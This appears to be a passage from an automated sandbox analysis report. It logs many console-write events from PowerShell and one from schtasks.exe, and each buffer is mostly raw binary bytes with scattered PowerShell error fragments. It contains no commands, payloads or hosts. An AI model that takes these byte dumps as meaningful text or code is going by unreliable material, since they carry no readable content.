Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.5.8.............}..v....`.8.....0.................v.....$.......$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................3..k......8..............._.............}..v......8.....0.................v.............$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.......................k....P.v..............._.............}..v....`.8.....0...............................$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................3..k......8..............._.............}..v......8.....0.................v.............$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.......................k....P.v..............._.............}..v....`"8.....0...............................$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................3..k.....#8..............._.............}..v.....#8.....0.................v.............$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.......................k....P.v..............._.............}..v....`*8.....0...............................$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................3..k.....+8..............._.............}..v.....+8.....0.................v.............$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.......................k....P.v..............._.............}..v....028.....0...............................$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................3..k.....28..............._.............}..v....h38.....0.................v.............$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.......................k....P.v..............._.............}..v....0:8.....0...............................$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................3..k.....:8..............._.............}..v....h;8.....0.................v.............$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....'....... . . .E.x.c.e.p.t.i.o.n..........._.............}..v.....?8.....0.................v.............$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....'...............3..k.....?8..............._.............}..v....8@8.....0.................v.............$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................0.......3............................... ........._.............}..v....xE8..... .......................l.......$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....3...............3..k....0F8..............._.............}..v.....F8.....0.................v.............$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....?....... ..........k....P.v..............._.............}..v....@J8.....0.................v.............$............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....?...............3..k.....J8..............._.............}..v....xK8.....0.................v.............$............... Jump to behavior
Source: C:\Windows\System32\schtasks.exe Console Write: ..................................................,.............................................P............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................#.......T.h.e. .s.t.r.i.n.g. .s.t.a.r.t.i.n.g.:.`I.........v.....................K..............(....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#................'.k......................_.............}..v....p.......0...............8............................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.5.9.............}..v............0.......................$....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../................'.k....8................._.............}..v............0...............8............................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;................ .k......................_.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;................'.k....8................._.............}..v............0...............8............................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G................ .k......................_.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G................'.k....8................._.............}..v............0...............8............................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S................ .k......................_.............}..v............0.......................d....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S................'.k......................_.............}..v.... .......0...............8............................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...._.......i.s. .m.i.s.s.i.n.g. .t.h.e. .t.e.r.m.i.n.a.t.o.r.:. .'.........0.......................:....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...._................'.k......................_.............}..v............0...............8............................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.0.1.............}..v............0.......................$....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k................'.k....`................._.............}..v............0...............8............................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....w................ .k......................_.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....w................'.k....`................._.............}..v............0...............8............................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..................... .k......................_.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................'.k....`................._.............}..v............0...............8............................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..................... .k......................_.............}..v............0.......................d....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................'.k......................_.............}..v....H.......0...............8............................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..................... .k......................_.............}..v....."......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................'.k....."................_.............}..v....H#......0...............8............................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..................... .k......................_.............}..v....x(......0.......................b....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................'.k....0)................_.............}..v.....)......0...............8............................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..................... .k......................_.............}..v...../......0.......................z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................'.k...../................_.............}..v....H0......0...............8............................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ ........ .k......................_.............}..v.....3......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................'.k.....4................_.............}..v.....5......0...............8............................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................0.......#.......................0.......................`I.........v.....................K...................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................*k.... )z..............._.............}..v.....)z.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.................*k....p_S..............._.............}..v....h0z.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.................*k.... 1z..............._.............}..v.....1z.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;.................*k....p_S..............._.............}..v.....6z.....0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................E.M.....;.................*k.....7z..............._.............}..v....08z.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.......A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v....H<z.....0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.................*k.....=z..............._.............}..v.....=z.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S.................*k....p_S..............._.............}..v.....Bz.....0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S.................*k....XCz..............._.............}..v.....Cz.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...._.................*k....p_S..............._.............}..v.....Jz.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...._.................*k....XKz..............._.............}..v.....Kz.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k....... . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v.....Oz.....0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k.................*k.....Pz..............._.............}..v....0Qz.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....w.................*k....p_S..............._.............}..v....pVz.....0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....w.................*k....(Wz..............._.............}..v.....Wz.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ .........*k....p_S..............._.............}..v....8[z.....0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....[z..............._.............}..v....p\z.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....`#......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....$................_.............}..v.....$......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....`+......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....,................_.............}..v.....,......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.....1......0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....2................_.............}..v....(3......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v....@7......0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....7................_.............}..v....x8......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.....=......0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....P>................_.............}..v.....>......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.....E......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....PF................_.............}..v.....F......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v.....J......0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....K................_.............}..v....(L......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....hQ......0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.... R................_.............}..v.....R......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ .........*k......................_.............}..v....0V......0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....V................_.............}..v....hW......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.....z......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....{................_.............}..v....(|......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v....(.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................*k....p_S..............._.............}..v............0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................*k....8................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.......A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v............0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.................*k......................_.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;.................*k....p_S..............._.............}..v....(.......0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;.................*k......................_.............}..v....`.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.................*k....p_S..............._.............}..v....(.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.................*k......................_.............}..v....`.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S....... . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v............0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S.................*k....8................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...._.................*k....p_S..............._.............}..v............0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...._.................*k......................_.............}..v....0.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k....... .........*k....p_S..............._.............}..v............0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k.................*k....x................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....8................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....8................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v....H.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v....`.......0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v............0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v....H.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....@................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ .........*k....p_S..............._.............}..v....P.......0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....p*......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....(+................_.............}..v.....+......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....p2......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....(3................_.............}..v.....3......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.....9......0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....9................_.............}..v....8:......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v....P>......0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....?................_.............}..v.....?......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................*k....p_S..............._.............}..v.....D......0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................*k....`E................_.............}..v.....E......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.................*k....p_S..............._.............}..v.....L......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.................*k....`M................_.............}..v.....M......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;....... . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v.....R......0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;.................*k.....R................_.............}..v....8S......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.................*k....p_S..............._.............}..v....xX......0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.................*k....0Y................_.............}..v.....Y......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S....... .........*k....p_S..............._.............}..v....@]......0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S.................*k.....]................_.............}..v....x^......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....g.................*k....p_S..............._.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....g.................*k......................_.............}..v....8.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....s.................*k....p_S..............._.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....s.................*k......................_.............}..v....8.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....H................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v............0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....8.......0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v....p.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....8.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v....p.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v............0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....H................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v....@.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ .........*k....p_S..............._.............}..v............0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....H................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....H................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.... .......0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v....X.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v....p.......0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....(................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#....... . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v.... .......0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................*k......................_.............}..v....X.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.................*k....p_S..............._.............}..v............0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.................*k....P................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;....... .........*k....p_S..............._.............}..v....`.......0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;.................*k......................_.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....O.................*k....p_S..............._.............}..v.... 1......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....O.................*k.....1................_.............}..v....X2......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....[.................*k....p_S..............._.............}..v.... 9......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....[.................*k.....9................_.............}..v....X:......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....g.................*k....p_S..............._.............}..v.....?......0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....g.................*k....h@................_.............}..v.....@......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....s.......A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v.....E......0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....s.................*k.....E................_.............}..v....8F......0................\S............................. Jump to behavior
